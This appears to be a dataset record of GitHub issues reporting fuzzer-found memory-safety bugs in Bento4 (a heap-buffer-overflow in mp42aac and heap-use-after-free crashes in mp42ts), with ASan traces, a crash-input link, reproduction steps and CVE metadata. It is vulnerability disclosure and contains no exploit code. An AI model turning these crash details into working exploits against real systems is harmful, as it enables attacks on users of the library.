Dear Bento4 developers, I used AFL++ to fuzz test Bento4 and found some problems. To debug a program built with ASan, here is some output ``` ================================================================= ==1982814==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000011f at pc 0x0000008aa64d bp 0x7fffba272270 sp 0x7fffba272268 READ of size 1 at 0x60200000011f thread T0 #0 0x8aa64c in AP4_Dec3Atom::AP4_Dec3Atom(unsigned int, unsigned char const*) /home/zt/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:161:57 #1 0x8a1f6e in AP4_Dec3Atom::Create(unsigned int, AP4_ByteStream&) /home/zt/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:56:16 #2 0x703433 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:769:24 #3 0x6f99a8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #4 0x833287 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zt/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #5 0x588686 in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420:5 #6 0x51763d in AP4_EncaSampleEntry::AP4_EncaSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/Bento4/Source/C++/Core/Ap4Protection.cpp:74:5 #7 0x70135f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:298:24 #8 0x6f99a8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #9 0x5bbc96 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101:13 #10 0x5b5c06 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57:16 #11 0x7018e6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458:20 #12 0x6f99a8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #13 0x6f79ac in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12 #14 0x4f0896 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/zt/Bento4/Source/C++/Core/Ap4File.cpp:104:12 #15 0x4f1ec4 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/zt/Bento4/Source/C++/Core/Ap4File.cpp:78:5 #16 0x4ca35b in main /home/zt/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22 #17 0x7fadc2fd5082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #18 0x41eccd in _start (/home/zt/Bento4/build/mp42aac+0x41eccd) 0x60200000011f is located 0 bytes to the right of 15-byte region [0x602000000110,0x60200000011f) allocated by thread T0 here: #0 0x4c6c8d in operator new[](unsigned long) (/home/zt/Bento4/build/mp42aac+0x4c6c8d) #1 0x4e9450 in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /home/zt/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:55:16 #2 0x703433 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:769:24 #3 0x6f99a8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #4 0x833287 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zt/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #5 0x588686 in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420:5 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/zt/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:161:57 in AP4_Dec3Atom::AP4_Dec3Atom(unsigned int, unsigned char const*) Shadow bytes around the buggy address: 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8010: fa fa 04 fa fa fa fd fa fa fa 01 fa fa fa 00 fa =>0x0c047fff8020: fa fa 00[07]fa fa 00 07 fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1982814==ABORTING ``` ### **Crash input:** https://github.com/zhangteng0526/crashes/blob/main/Bento4/input1 ### **Validation steps** ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j$(nproc) ./mp42aac input1 /dev/null ``` ### **环境** ``` Ubuntu 20.04 LTS Bento v1.6.0-641-2-g1529b83 ```
Heap-buffer-overflow with ASAN in mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/914/comments
0
2023-12-28T03:49:43Z
2024-02-17T18:14:52Z
https://github.com/axiomatic-systems/Bento4/issues/914
2,057,955,798
914
[ -0.030684994533658028, -0.0003192806034348905, -0.016858015209436417, -0.01590443029999733, 0.028999192640185356, -0.01254985574632883, -0.05077838525176048, 0.03896074742078781, -0.012337001971900463, 0.03090636245906353, -0.012898935936391354, 0.010148866102099419, 0.026087353006005287, ...
1,129
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Heap-buffer-overflow with ASAN in mp42aac Issue date: --- start body --- Dear Bento4 developers, I used AFL++ to fuzz test Bento4 and found some problems. To debug a program built with ASan, here is some output ``` ================================================================= ==1982814==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000011f at pc 0x0000008aa64d bp 0x7fffba272270 sp 0x7fffba272268 READ of size 1 at 0x60200000011f thread T0 #0 0x8aa64c in AP4_Dec3Atom::AP4_Dec3Atom(unsigned int, unsigned char const*) /home/zt/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:161:57 #1 0x8a1f6e in AP4_Dec3Atom::Create(unsigned int, AP4_ByteStream&) /home/zt/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:56:16 #2 0x703433 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:769:24 #3 0x6f99a8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #4 0x833287 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zt/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #5 0x588686 in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420:5 #6 0x51763d in AP4_EncaSampleEntry::AP4_EncaSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/Bento4/Source/C++/Core/Ap4Protection.cpp:74:5 #7 0x70135f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:298:24 #8 0x6f99a8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #9 0x5bbc96 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101:13 #10 0x5b5c06 in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57:16 #11 0x7018e6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458:20 #12 0x6f99a8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #13 0x6f79ac in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154:12 #14 0x4f0896 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/zt/Bento4/Source/C++/Core/Ap4File.cpp:104:12 #15 0x4f1ec4 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/zt/Bento4/Source/C++/Core/Ap4File.cpp:78:5 #16 0x4ca35b in main /home/zt/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22 #17 0x7fadc2fd5082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #18 0x41eccd in _start (/home/zt/Bento4/build/mp42aac+0x41eccd) 0x60200000011f is located 0 bytes to the right of 15-byte region [0x602000000110,0x60200000011f) allocated by thread T0 here: #0 0x4c6c8d in operator new[](unsigned long) (/home/zt/Bento4/build/mp42aac+0x4c6c8d) #1 0x4e9450 in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /home/zt/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:55:16 #2 0x703433 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:769:24 #3 0x6f99a8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #4 0x833287 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zt/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #5 0x588686 in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420:5 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/zt/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:161:57 in AP4_Dec3Atom::AP4_Dec3Atom(unsigned int, unsigned char const*) Shadow bytes around the buggy address: 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8010: fa fa 04 fa fa fa fd fa fa fa 01 fa fa fa 00 fa =>0x0c047fff8020: fa fa 00[07]fa fa 00 07 fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1982814==ABORTING ``` ### **Crash input:** https://github.com/zhangteng0526/crashes/blob/main/Bento4/input1 ### **Validation steps** ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j$(nproc) ./mp42aac input1 /dev/null ``` ### **环境** ``` Ubuntu 20.04 LTS Bento v1.6.0-641-2-g1529b83 ``` --- end body --- comments : --- start comments --- --- end comments ---
6,670
CVE-2024-30807
2024-04-02T18:15:12.460
An issue was discovered in Bento4 v1.6.0-641-2-g1529b83. There is a heap-use-after-free in AP4_UnknownAtom::~AP4_UnknownAtom at Ap4Atom.cpp, leading to a Denial of Service (DoS), as demonstrated by mp42ts.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/axiomatic-systems/Bento4/issues/937" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/zhangteng0526/CVE-information/blob/main/CVE-2024-30807" } ]
null
null
[ "axiomatic-systems", "Bento4" ]
Issue
Dear Bento4 developers, I used AFL++ to fuzz test Bento4 and found some problems. To debug a program built with ASan, here is some output **BUG1** ``` ================================================================= ==2611989==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000000010 at pc 0x0000004d43d9 bp 0x7fff45dd24e0 sp 0x7fff45dd24d8 READ of size 8 at 0x604000000010 thread T0 #0 0x4d43d8 in AP4_SubStream::~AP4_SubStream() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ByteStream.cpp:428:17 #1 0x4d43d8 in AP4_SubStream::~AP4_SubStream() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ByteStream.cpp:427:1 #2 0x5840b0 in AP4_DataAtom::~AP4_DataAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/MetaData/Ap4MetaData.cpp:1454:5 #3 0x5840b0 in AP4_DataAtom::~AP4_DataAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/MetaData/Ap4MetaData.cpp:1453:1 #4 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #5 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #6 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #7 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #8 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #9 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #10 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #11 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #12 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #13 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #14 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #15 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #16 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #17 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #18 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #19 0x5ec534 in AP4_ContainerAtom::~AP4_ContainerAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.h:48:7 #20 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #21 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #22 0x4df821 in AP4_File::~AP4_File() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:88:1 #23 0x4df821 in AP4_File::~AP4_File() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:85:1 #24 0x4c84d5 in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:519:9 #25 0x7f20b83c5082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #26 0x41c8fd in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x41c8fd) 0x604000000010 is located 0 bytes inside of 48-byte region [0x604000000010,0x604000000040) freed by thread T0 here: #0 0x4c500d in operator delete(void*) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c500d) #1 0x4c842a in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:518:9 #2 0x7f20b83c5082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x4c47ad in operator new(unsigned long) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c47ad) #1 0x589178 in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279:14 SUMMARY: AddressSanitizer: heap-use-after-free /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ByteStream.cpp:428:17 in AP4_SubStream::~AP4_SubStream() Shadow bytes around the buggy address: 0x0c087fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c087fff8000: fa fa[fd]fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff8010: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff8020: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff8030: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff8040: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2611989==ABORTING ``` **BUG2** ``` ================================================================= ==3677656==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000000010 at pc 0x000000598dee bp 0x7ffd22a2a640 sp 0x7ffd22a2a638 READ of size 8 at 0x604000000010 thread T0 #0 0x598ded in AP4_UnknownAtom::~AP4_UnknownAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:408:25 #1 0x598ded in AP4_UnknownAtom::~AP4_UnknownAtom() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:405:1 #2 0x59b000 in AP4_List<AP4_Atom>::DeleteReferences() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4List.h:476:9 #3 0x59b000 in AP4_AtomParent::~AP4_AtomParent() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:516:16 #4 0x4df821 in AP4_File::~AP4_File() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:88:1 #5 0x4df821 in AP4_File::~AP4_File() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:85:1 #6 0x4c84d5 in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:519:9 #7 0x7f3aff20b082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x41c8fd in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x41c8fd) 0x604000000010 is located 0 bytes inside of 48-byte region [0x604000000010,0x604000000040) freed by thread T0 here: #0 0x4c500d in operator delete(void*) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c500d) #1 0x4c842a in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:518:9 #2 0x7f3aff20b082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x4c47ad in operator new(unsigned long) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c47ad) #1 0x589178 in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279:14 SUMMARY: AddressSanitizer: heap-use-after-free /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:408:25 in AP4_UnknownAtom::~AP4_UnknownAtom() Shadow bytes around the buggy address: 0x0c087fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c087fff8000: fa fa[fd]fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c087fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3677656==ABORTING ``` **BUG3** ``` ================================================================= ==3972313==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000002b18 at pc 0x0000004f35b1 bp 0x7fff7428d660 sp 0x7fff7428d658 READ of size 8 at 0x604000002b18 thread T0 #0 0x4f35b0 in AP4_Sample::GetOffset() const /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Sample.h:99:48 #1 0x4f35b0 in AP4_LinearReader::Advance(bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4LinearReader.cpp:434:54 #2 0x4f42a2 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4LinearReader.cpp:530:29 #3 0x4cb0b0 in ReadSample(SampleReader&, AP4_Track&, AP4_Sample&, AP4_DataBuffer&, double&, bool&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181:32 #4 0x4cb0b0 in WriteSamples(AP4_Mpeg2TsWriter&, AP4_Track*, SampleReader*, AP4_Mpeg2TsWriter::SampleStream*, AP4_Track*, SampleReader*, AP4_Mpeg2TsWriter::SampleStream*, unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:306:22 #5 0x4cb0b0 in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:640:14 #6 0x7fa64720d082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c8fd in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x41c8fd) 0x604000002b18 is located 8 bytes inside of 48-byte region [0x604000002b10,0x604000002b40) freed by thread T0 here: #0 0x4c500d in operator delete(void*) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c500d) #1 0x4f2dff in AP4_LinearReader::SampleBuffer::~SampleBuffer() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4LinearReader.h:104:26 #2 0x4f2dff in AP4_LinearReader::Advance(bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4LinearReader.cpp:462:17 previously allocated by thread T0 here: #0 0x4c47ad in operator new(unsigned long) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42ts+0x4c47ad) #1 0x4f2360 in AP4_LinearReader::Advance(bool) 